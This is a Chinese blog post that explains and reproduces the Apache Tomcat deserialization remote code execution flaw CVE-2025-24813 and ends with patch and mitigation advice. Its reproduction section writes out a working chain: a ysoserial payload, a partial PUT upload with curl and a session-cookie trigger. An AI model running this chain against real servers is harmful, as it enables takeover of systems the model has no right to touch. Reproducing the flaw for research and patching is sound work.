CVE-2025-24813 RCE复现

最新推荐文章于 2025-04-07 10:26:50 发布
最新推荐文章于 2025-04-07 10:26:50 发布
阅读量3.3k 收藏 16
点赞数 25
文章标签: apache tomcat java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42773448/article/details/146199296
版权

Apache Tomcat 远程代码执行漏洞

⚠️ **免责声明**
本文目标读者为安全研究人员与运维人员,任何利用本文内容进行非法攻击的行为均与作者无关。

1. 漏洞描述

Apache Tomcat 在特定配置下存在反序列化漏洞。攻击者可通过构造恶意请求,利用文件会话持久化机制将恶意序列化数据写入服务器,并在后续请求中触发反序列化操作,从而导致远程代码执行。

2. 影响范围

9.0.0.M1 <= Apache Tomcat <= 9.0.98

10.1.0-M1 <= Apache Tomcat <= 10.1.34

11.0.0-M1 <= Apache Tomcat <= 11.0.2

3. 漏洞触发条件

1、DefaultServlet 写入功能启用:需在 web.xml 中配置 readonly=false

2、Partial PUT 请求支持:Tomcat 默认支持分块上传。

3、文件会话持久化启用:需在 context.xml 中配置 PersistentManagerFileStore

4、存在反序列化利用链:类路径下需包含存在漏洞的库(如commons-collections-3.2.1.jar)。

4. 漏洞原理

1、Tomcat 文件会话持久化:Tomcat 支持将 HTTP 会话数据持久化到文件系统中,默认存储路径为 $CATALINA_BASE/work/Catalina/localhost/ROOT

2、DefaultServlet 写入功能:Tomcat 的 DefaultServlet 默认支持文件上传功能,但写入功能默认关闭。

3、Partial PUT 请求:Tomcat 支持分块上传文件(Partial PUT),允许客户端通过 Content-Range 头部分上传文件。

4.1 漏洞利用流程

1、上传恶意序列化数据

攻击者通过 Partial PUT 请求将恶意序列化数据写入 Tomcat 的工作目录。

文件路径中的 / 被转换为 .,例如 /evil/session 被存储为 .evil.session。

2、触发反序列化

攻击者通过设置 JSESSIONID=.evil,诱导 Tomcat 加载恶意会话文件。

Tomcat 在加载会话文件时触发反序列化操作,执行恶意代码。

4.2 漏洞核心问题

  • 文件名处理缺陷:Tomcat 在处理 Partial PUT 请求时,未对文件名进行严格校验,导致攻击者可通过路径穿越写入恶意文件。
  • 反序列化未校验:Tomcat 在加载会话文件时未对反序列化数据进行校验,导致恶意代码执行。

5. 漏洞复现

5.1 环境搭建

1、安装受影响版本的 Tomcat(如 9.0.98)。

2、配置 context.xml 

<Context>
    <Manager className="org.apache.catalina.session.PersistentManager">
        <Store className="org.apache.catalina.session.FileStore"/>
    </Manager>
</Context>

3、配置 web.xml:

<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
</servlet>

4、添加漏洞库:将 commons-collections-3.2.1.jar 放入 lib 目录。

5.2 复现步骤

1、生成恶意序列化数据

java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" > payload.ser

2、上传恶意文件

curl -X PUT -H "Content-Range: bytes 0-999/1200" --data-binary @payload.ser http://target:8080/evil/session

3、触发漏洞

curl -H "Cookie: JSESSIONID=.evil" http://target:8080/

4、验证漏洞

6. 潜在危害

远程代码执行:攻击者可利用漏洞在目标服务器上执行任意命令。

数据泄露:攻击者可读取服务器上的敏感文件。

服务器控制:攻击者可完全控制受影响的服务器。

7. 修复建议

7.1 官方修复

Apache 官方已发布安全通告并发布了修复版本,请尽快下载安全版本修复漏洞。

Upgrade to Apache Tomcat 11.0.3 or later

Upgrade to Apache Tomcat 10.1.35 or later

Upgrade to Apache Tomcat 9.0.99 or late

7.2 临时缓解措施

1、禁用 DefaultServlet 写入功能:在 web.xml 中确保 readonly=true。
2、禁用文件会话持久化:移除 context.xml 中的 PersistentManager 配置。
3、移除漏洞库:删除或更新类路径下存在漏洞的库(如commons-collections-3.2.1.jar)。

8. 总结

该漏洞利用条件较为复杂,但一旦满足条件,攻击者可实现远程代码执行,危害极大。建议受影响的用户及时采取修复措施,避免被攻击者利用。

参考链接

https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq

⚠️本文仅用于教育和安全研究目的。对本文描述的技术的任何滥用行为,作者不承担任何责任。

[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)
qq_51577576的博客
12-07 715
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE) Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。
【漏洞复现Apache Tomcat 远程代码执行(CVE-2025-24813
李火火的安全圈
03-28 448
Apache Tomcat 是一个开源的、轻量级的 Java Servlet 容器和 Web 服务器,由Apache软件基金会开发和维护,支持运行 Java Servlet、JavaServer Pages (JSP) 和其他基于 Java 的 Web 应用程序,广泛用于开发和部署企业级 Web 应用。
Goby 漏洞安全通告| Apache Tomcat 远程命令执行(CVE-2025-24813)
m0_46699477的博客
03-12 2098
Apache Tomcat 是一个开源的 Java Servlet 容器,广泛用于运行基于 Java 的 Web 应用程序。该漏洞(CVE-2025-24813)允许远程攻击者通过特定的恶意请求在目标系统上执行任意命令,从而完全控制受影响的服务器。 满足以下条件,攻击者可以远程代码执行(RCE): 1. DefaultServlet 启用了写入权限(默认情况下禁用)。 2. 服务器启用了partial PUT(默认启用)。 3. Tomcat 使用了基于文件的 Session 持久化机制(非默认配置,默认为
CVE-2025-24813 漏洞全解析|Apache Tomcat 关键路径绕过与RCE
syg6921008的博客
04-06 3483
Apache Tomcat 中一个关键的路径等效性(Path Equivalence)漏洞,允许未经身份验证的远程攻击者在特定配置下实现远程代码执行(RCE)、读取敏感文件,甚至篡改文件内容。该漏洞已在野外被观察到存在实际利用行为,影响范围广泛。CVE-2025-24813 是一次典型的“路径+反序列化+配置缺陷”复合型漏洞,表面上源于文件路径处理缺陷,实际利用则依赖于多个错误配置的叠加效应。边界可信假设失效、中间件权限设置失误、反序列化引擎暴露等老问题,在现代系统中依旧构成致命威胁。
Tomcat RCECVE-2025-24813复现
Neolock的博客
03-21 2592
它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。这里需要注意Content-Range的分块值需要与Content-Length保持一致,且大于当前文件的长度。我们都知道tomcatJava语言开发的,所以需要JAVA环境,我这里的Java环境是1.8.0_441。当文件被上传成功后,大概30s之内payload会被自动触发,随之文件会被清除。
【漏洞复现CVE-2025-24813Apache Tomcat 远程代码执行漏洞
最新发布
网络安全相关技术分享
04-07 904
Tomcat 在特定配置下存在反序列化漏洞。攻击者可通过构造恶意请求,利用文件会话持久化机制将恶意序列化数据写入服务器,并在后续请求中触发反序列化操作,从而导致远程代码执行。
【漏洞处置SOP】Apache Tomcat远程代码执行漏洞(CVE-2025-24813)处置建议
weixin_43727442的博客
03-14 266
安全漏洞防治中心团队成员编制了升级到安全版本的标准作业程序(SOP),将 Apache Tomcat 9.0.98 升级到安全版本 9.0.102,已完成验证。
【安全漏洞】CVE-2025-24813
宣晨光
03-12 1084
Apache Tomcat远程代码执行漏洞(CVE-2025-24813)是一个严重的安全问题,它允许攻击者在特定条件下上传恶意Session文件并执行远程代码。以下是关于此漏洞的详细信息和建议的应对措施。
CVE-2019-18935:RCE漏洞用于ASP.NET AJAX的Telerik UI中的.NET JSON反序列化漏洞
05-25
CVE-2019-18935 Telerik UI中用于ASP.NET AJAX的.NET JSON反序列化漏洞的概念验证漏洞,允许远程执行代码。 描述 是用于Web应用程序的UI组件的广泛使用的套件。 它以不安全的方式反序列化JSON对象,从而导致在软件...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
CVE-2025-1094: 通过 WebSocket 的 SQL 注入到 RCE
weixin_47075747的博客
02-27 559
该漏洞利用 PostgreSQL 中的 SQL 注入漏洞,注入恶意代码读取敏感文件(如),并将其存储在易受攻击的服务器上。然后,利用活动的 WebSocket 连接劫持,执行任意命令,最终在被攻陷的服务器上实现远程 shell。
Apache Tomcat RCE漏洞复现CVE-2025-24813
weixin_55010563的博客
03-15 987
使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录work\Catalina\localhost\ROOT。尝试使用 Tomcat 9.0.98 版本复现:https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.zip。
Spring Boot Tomcat 漏洞修复
Gjw_java的博客
03-13 2289
Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。
Spring Boot 项目零风险升级 Tomcat 指南:锁定版本也能修复漏洞
u012151345的博客
03-12 1291
由于历史原因,项目使用JDK8,springboot版本2.7.18,已经是2.7.x版本下的最新版本,无法通过升级springboot的方式来升级tomcat版本。),添加如下代码,会自动覆盖tomcat的版本,然而试过之后并没有成功,重新启动服务后,tomcat版本仍然是9.0.83。误区,就是引入新版本的tomcat,要先在旧版本的spring-boot-starter-web中移除旧的tomcat。由于tomcat旧版本存在漏洞,需要升级,大致版本情况如下图所示,有兴趣的可以看下网易的原文。
漏洞预警 | Apache Tomcat 存在远程代码执行漏洞(CVE-2025-24813
C20220511的博客
03-14 530
Apache Tomcat 是一个Apache软件基金会属下Jakarta项目开发的开源的、轻量级的 Java Web 服务器 ,主要用于运行基于 Java Servlet 和 JavaServer Pages (JSP) 开发的 Web 应用程序,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。3、应用程序使用了 Tomcat 的基于文件的会话持久化功能,并采用默认的存储位置;③升级到 Apache Tomcat 9.0.99 或更高版本。
Zyxel Telnet 漏洞分析(CVE-2025-0890、CVE‑2024‑40891)
2401_85280228的博客
02-27 1352
参考资料这是2025年开年分析的第一个洞。2月4日 Zyxel 发布安全公告,旗下部分旧款 DSL 客户终端设备(CPE)存在严重的安全漏洞[1],包括 默认凭证不安全问题 和 命令注入漏洞 ,攻击者可通过默认凭证登录 Telnet 并利用此漏洞在受影响的设备上执行任意命令。
Apache Tomcat RCE 稳定复现 保姆级!(CVE-2024-50379)附视频+POC
qq_63217130的博客
12-19 8286
最近爆出 Apache Tomcat条件竞争导致的RCE,影响范围当然是巨大的,公司也及时收到了相关情报,于是老大让我复现,以更好的帮助公司进行修复漏洞。复现难度其实并不大,但是成功率很低,相信很多师傅也在复现,希望能够成功,所以我对“成功率”进行了一点点研究,希望能够提高师傅们复现成功的概率。
OpenSSH CVE-2025-26466 漏洞解析与防御,从零基础到精通,收藏这篇就够了!
Libra1313的博客
03-17 1634
CVE-2025-26466 是一个影响 OpenSSH 的预身份验证拒绝服务(DoS)漏洞。它通过操纵 SSH 握手过程来消耗系统资源,导致系统崩溃或服务中断。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值